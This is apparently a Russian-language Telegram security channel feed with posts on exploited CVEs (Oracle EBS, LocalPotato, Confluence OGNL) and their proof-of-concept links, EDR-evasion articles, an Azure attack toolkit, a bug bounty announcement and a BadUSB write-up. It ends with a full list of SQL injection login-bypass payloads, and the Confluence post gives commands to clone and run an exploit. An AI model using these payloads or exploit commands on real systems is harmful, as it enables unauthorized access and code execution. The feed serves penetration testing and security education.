Похек
16.4K subscribers
2.08K photos
110 videos
243 files
3.06K links
All materials published on the channel are for educational and informational purposes only.

Мнение автора ≠ мнение компании, где работает автор

Чат: @poxek_chat

Реклама: @PoxekAds_bot или
https://telega.in/c/poxek

РКН: https://clck.ru/3FsVhp
Download Telegram
CVE-2022-21587
Oracle E-Business Suite (EBS)
Status: Exploited in the Wild

CVE-2022-21587 может привести к неавторизованному удаленному выполнению кода. 16 января 2023 года компания Viettel Security опубликовала анализ этой проблемы, подробно описав первопричину и метод использования уязвимости для получения возможности выполнения кода через полезную нагрузку Perl. Эксплойт, основанный на методе анализа Viettel Security, был опубликован на GitHub "HMs" 6 февраля 2023 года. Oracle приписала "l1k3beef" в качестве первооткрывателя уязвимости.

Анализ показал, что во время эксплуатации также возможно использование полезной нагрузки на основе Java Server Page (JSP) для RCE.

P.S. POC

#CVE #POC
😱2
Forwarded from Standoff 365
🫡 Легальный шанс взломать Госуслуги

Добавили на платформу две багбаунти программы для тех, кто неравнодушен к государственным сервисам и хочет сделать их безопаснее, ну, или всегда мечтал взломать :)

Госуслуги — сервис с информацией о государственных и муниципальных учреждениях и возможностью воспользоваться их электронными услугами онлайн.
🔸 gosuslugi.ru, freeinternet.gosuslugi.ru, payment.gosuslugi.ru, смотрите полный скоуп на bb.standoff365.com/vendors/digital-gov

ЕСИА — единая система идентификации и аутентификации, государственный провайдер Single sign-on с удостоверением личности пользователя.
🔸 esia.gosuslugi.ru, 109.207.2.205, 213.59.254.8

💰 до 1 000 000 ₽
Также лучших ждут специально придуманные по такому случаю подарки и инвайты на PHDays 12.

🔮 Сделать безопаснее системы электронного правительства → bb.standoff365.com/vendors/digital-gov
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
Похек
Скрываясь на виду у всех. №1 В этом блоге представлен высокоуровневый обзор трассировки стека, того, как EDR/AV используют ее для обнаружения, использования телеметрии ETWTI и того, что можно сделать, чтобы обойти ее. Итак, прежде чем мы обсудим уклонение…
Скрываясь на виду у всех. №2

Судя по реакции и просмотрам на статье. Она вам понравилась, поэтому выкладываю вторую часть статьи!

Это вторая часть блога о проксировании загрузки DLL для скрытия подозрительных следов стека, ведущих к выделенной пользователем области RX. Я не буду углубляться в то, как работает стек, потому что я уже рассказал об этом в предыдущем блоге, который доступен по вышеуказанной ссылке.

#RedTeam #Bypass
🔥5
Похек
Скрываясь на виду у всех. №2 Судя по реакции и просмотрам на статье. Она вам понравилась, поэтому выкладываю вторую часть статьи! Это вторая часть блога о проксировании загрузки DLL для скрытия подозрительных следов стека, ведущих к выделенной пользователем…
Как вы заметили. Я сделал для своего сайта специальный шаблон Telegram IV (Instant View). Теперь статьи можно читать не покидая телеграм. Но если вы хотите глубже погрузиться в разбор кода в моих статьях, то читайте на сайте. Там есть подсветка синтаксиса для всех ЯПов. Удобнее и приятнее читать будет
LocalPotato CVE-2023-21746 Windows LPE

Еще одно повышение привилегий локальной Windows с помощью новой техники Potato ;)

Атака LocalPotato - это тип атаки отражения NTLM, направленной на локальную аутентификацию. Эта атака позволяет произвольно читать/записывать файлы и повышать привилегии.

#CVE #POC
7
Похек
LocalPotato CVE-2023-21746 Windows LPE Еще одно повышение привилегий локальной Windows с помощью новой техники Potato ;) Атака LocalPotato - это тип атаки отражения NTLM, направленной на локальную аутентификацию. Эта атака позволяет произвольно читать/записывать…
Разбор уязвимости LocalPotato CVE-2023-21746 на русском языке!

LocalPotato CVE-2023-21746 Windows LPE

После обширного исследования мы пришли к "LocalPotato", не очень распространенной атаке отражения NTLM в локальной аутентификации, позволяющей произвольное чтение/запись файлов. Сочетание возможности произвольной записи в файл с выполнением кода позволило нам добиться повышения привилегий по всей цепочке от пользователя до SYSTEM.

В этой статье есть разбор эксплойта и то, как он был пропатчен. Данная статья представляет большой интерес для Red&Blue Team!
3
🤣4
MicroBurst: A PowerShell Toolkit for Attacking Azure

MicroBurst включает функции и сценарии, поддерживающие обнаружение служб Azure, проверка на misconfiguration и post exploitation, такие как сброс учетных данных. Инструмент предназначен для использования во время тестов на проникновение, где используется Azure.

Импорт модуля:
Import-Module .\MicroBurst.psm1

Это позволит импортировать все применимые функции на основе установленных в настоящее время модулей в вашем окружении.

Используйте следующую команду "Unblock-File" для рекурсивной проверки:
dir -Recurse .\MicroBurst-master | Unblock-File

Дополнительный материал по пентесту Azure:
A Beginners Guide to Gathering Azure Passwords
Anonymously Enumerating Azure Services
Anonymously Enumerating Azure File Resources
Get-AzurePasswords: Exporting Azure RunAs Certificates for Persistence
Using Azure Automation Accounts to Access Key Vaults
Get-AzPasswords: Encrypting Automation Password Data
Azure Privilege Escalation Using Managed Identities
🔥4👍1
This media is not supported in your browser
VIEW IN TELEGRAM
Осталось 8 подписчиков!❤️
🔥5
Поздравляю нас с преодолением первой тысячи подписчиков!!⚡️
🎉16👍2🔥2
Xakep - Очень плохая флешка.pdf
1.5 MB
Xakep - Очень плохая флешка. Разбираем атаку BadUSB в деталях

Об ата­ках BadUSB «Хакер» уже не­однократ­но писал. Сегод­ня мы раз­берем кон­крет­ный при­мер реали­зации такой ата­ки, под­робно опи­шем устрой­ство вре­донос­ной флеш­ки, при­ведем записан­ный на нее код и обсу­дим, как зас­тавить поль­зовате­ля Windows или Linux под­клю­чить ее к сво­ему компь­юте­ру.

#Xakep
🔥7
HTB Cheat Sheet.pdf
173.1 KB
HTB CheatSheet Labs

#HTB
3
CVE-2022-26134 Confluence Pre-Auth RCE via OGNL Injection

Confluence - это корпоративная вики на основе веб-технологий, разработанная австралийской компанией Atlassian. 02 июня 2022 года компания Atlassian выпустила совет по безопасности для своих приложений Confluence Server и Data Center, в котором говорится об уязвимости критической важности, связанной с неавторизованным удаленным выполнением кода. Уязвимость инъекции OGNL позволяет не аутентифицированному пользователю выполнить произвольный код на Confluence Server или Data Center.

Использование:
git clone https://github.com/whokilleddb/CVE-2022-26134-Confluence-RCE.git
python3 confluence-exploit.py -u https://confluence.app

Rooted!

#CVE #POC
👍5
8
Похек
Photo
OSINT 14 февраля

44.688485,-63.6641767
41.303921,-81.901693
43.978734,15.384636
-20.937542, 164.658825
🌚4👍3
🧠 Awesome ChatGPT Prompts

Добро пожаловать в репозиторий "Awesome ChatGPT Prompts"! Это коллекция примеров запросов для ChatGPT.

В этом репозитории вы найдете множество подсказок, которые можно использовать в ChatGPT. Мы призываем вас добавлять свои собственные подсказки в этот список, а также использовать ChatGPT для генерации новых команд. Для начала, просто клонируйте этот репозиторий и используйте подсказки из файла README.md в качестве исходных данных для ChatGPT. Вы также можете использовать запросы в этом файле как вдохновение для создания своих собственных.

Мы надеемся, что эти запросы окажутся полезными, и вам будет интересно использовать ChatGPT!

#ChatGPT
🔥4
Legend
🐳4
CrackerJack

Веб интерфейс написанный на Python для Hashcat
Цель этого проекта - сохранить независимость графического интерфейса и Hashcat.
В двух словах, вот как это работает:
1. Пользователь загружает хэши, выбирает wordlist/правила/маску и т.д. и нажимает "Start".
2. Веб-сервер открывает новый screen.
3. Генерирует команду hashcat на основе настроек.
4. Запускает команду внутри screen.
5. Следит выводом screen, разбирает его и отображает в графическом интерфейсе.

Это позволяет CrackerJack быть перспективным, поскольку он упрощает работу с Hashcat.

#tools
4
SQL injection auth bypass list

or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055

#sqli
🐳6👍1💯1